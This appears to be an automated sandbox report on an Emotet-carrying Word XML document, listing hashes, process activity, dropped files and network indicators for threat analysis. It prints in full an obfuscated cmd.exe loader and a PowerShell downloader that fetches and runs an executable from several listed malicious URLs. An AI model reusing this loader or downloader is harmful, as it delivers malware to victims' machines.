
2019-01

Full analysis: https://app.any.run/tasks/66dc8cca-d638-4056-8b19-eb7c65063288
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 12:45:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: C68900DE3BFA05A67E89375288401241
SHA1: 8AE0D511CF3CC7CE45D9400E6B4D7188A658EB3C
SHA256: F81B5788D88B31A4689A13A770EDC2D389DB26CA0D0BB3FF528517152000FAA8
SSDEEP: 3072:YNGqNPxmmjL/xSu90OoiLuDKZXfwKeljR1z:YNCMxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2672)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2672)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2656)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2868)
    • Application was dropped or rewritten from another process

      • 422.exe (PID: 2396)
      • 422.exe (PID: 3068)
      • wabmetagen.exe (PID: 2572)
      • wabmetagen.exe (PID: 3072)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3236)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3236)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2980)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 2656)
    • Creates files in the user directory

      • powershell.exe (PID: 3236)
    • Application launched itself

      • cmd.exe (PID: 2656)
      • 422.exe (PID: 2396)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3236)
      • 422.exe (PID: 3068)
    • Starts itself from another location

      • 422.exe (PID: 3068)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2672)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2672)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3236)
      • 422.exe (PID: 3068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 12:21:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 12:21:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (base64-encoded binary data omitted)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00C25C6E
WordDocumentBodySectPRRsidRPr: 00802DF5
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
Total processes: 42
Monitored processes: 11
Malicious processes: 5
Suspicious processes: 4

Behavior graph

Processes shown, in order: msoxmled.exe (no specs), winword.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), powershell.exe, 422.exe (no specs), 422.exe, wabmetagen.exe (no specs), wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2980
CMD: "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\2019-01.xml"
Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: XML Editor
Exit code: 0
Version: 14.0.4750.1000

PID: 2672
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-01.xml"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: MSOXMLED.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

4044c:\u9309\p266\v5884\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe"c:\windows\system32\cmd.exeWINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

2656CmD /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe"C:\Windows\system32\cmd.execmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2772
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2868
CMD: cmd.exe
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3236
CMD: powershell $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2396
CMD: "C:\Users\admin\AppData\Local\Temp\422.exe"
Path: C:\Users\admin\AppData\Local\Temp\422.exe
Parent process: powershell.exe
User: admin
Company: Networks Associates Technology, Inc
Integrity Level: MEDIUM
Exit code: 0
Version: 8, 0, 0, 26

PID: 3068
CMD: "C:\Users\admin\AppData\Local\Temp\422.exe"
Path: C:\Users\admin\AppData\Local\Temp\422.exe
Parent process: 422.exe
User: admin
Company: Networks Associates Technology, Inc
Integrity Level: MEDIUM
Exit code: 0
Version: 8, 0, 0, 26

PID: 2572
CMD: "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process: 422.exe
User: admin
Company: Networks Associates Technology, Inc
Integrity Level: MEDIUM
Exit code: 0
Version: 8, 0, 0, 26

Total events: 2 159
Read events: 1 677
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 3

Dropped files

PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR6CC4.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AFE216.jpg
Type: -
MD5: -
SHA256: -

PID: 3236
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OI8FXJPB5AJ1KEDKANLC.temp
Type: -
MD5: -
SHA256: -

PID: 3236
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247b5b.TMP
Type: binary
MD5: 6073B6FC66D2E68644893344F6904E4A
SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3

PID: 3236
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\422.exe
Type: executable
MD5: 4EDAB722825EAC006D2D2FFC49B5DF50
SHA256: 278EDAF4D066D5BBAB721D74664181BB8F67F1AFFC29E8B2BC9B66B50566F8E2

PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: C569802DB5849779F22174B9AB0F135F
SHA256: 6C3CAD88468FE63910B07989B21F7D4FABE3C3BD098CFFAF6E32CA3A869558B7

PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$019-01.xml
Type: pgc
MD5: AF626B5FFEDD638D547BF9DF8D369FB9
SHA256: 1792B5CE3CD8F3DD14E88856397B9E82F0CF0A92794C8B332D74C013AB827F87

PID: 3068
Process: 422.exe
Filename: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Type: executable
MD5: 4EDAB722825EAC006D2D2FFC49B5DF50
SHA256: 278EDAF4D066D5BBAB721D74664181BB8F67F1AFFC29E8B2BC9B66B50566F8E2

PID: 3236
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 6073B6FC66D2E68644893344F6904E4A
SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3

PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: 0A8E78F11D13A705DE736D4A9E5A7635
SHA256: 8D4F52801AAF8AAA79B2BE36FAC418F9AF111DF0C0195161FCA5BAD7CC98314C

HTTP(S) requests: 3
TCP/UDP connections: 2
DNS requests: 1
Threats: 0

HTTP requests

PID: 3072
Process: wabmetagen.exe
Method: GET
HTTP Code: -
IP: 190.55.123.250:80
URL: http://190.55.123.250/
CN: AR
Type: -
Size: -
Reputation: malicious

PID: 3236
Process: powershell.exe
Method: GET
HTTP Code: 200
IP: 46.242.177.30:80
URL: http://agatawierzbicka.com/MdM5N5SCi/
CN: PL
Type: executable
Size: 348 Kb
Reputation: suspicious

PID: 3236
Process: powershell.exe
Method: GET
HTTP Code: 301
IP: 46.242.177.30:80
URL: http://agatawierzbicka.com//MdM5N5SCi
CN: PL
Type: html
Size: 245 b
Reputation: suspicious

Connections

PID: 3072
Process: wabmetagen.exe
IP: 190.55.123.250:80
Domain: -
ASN: Telecentro S.A.
CN: AR
Reputation: malicious

PID: 3236
Process: powershell.exe
IP: 46.242.177.30:80
Domain: agatawierzbicka.com
ASN: home.pl S.A.
CN: PL
Reputation: suspicious

DNS requests

Domain: agatawierzbicka.com
IP: 46.242.177.30
Reputation: suspicious

Threats

PID: 3236
Process: powershell.exe
Class: Potential Corporate Privacy Violation
Message: ET POLICY PE EXE or DLL Windows file download HTTP

PID: 3236
Process: powershell.exe
Class: Potentially Bad Traffic
Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

PID: 3236
Process: powershell.exe
Class: Misc activity
Message: ET INFO EXE - Served Attached HTTP
No debug info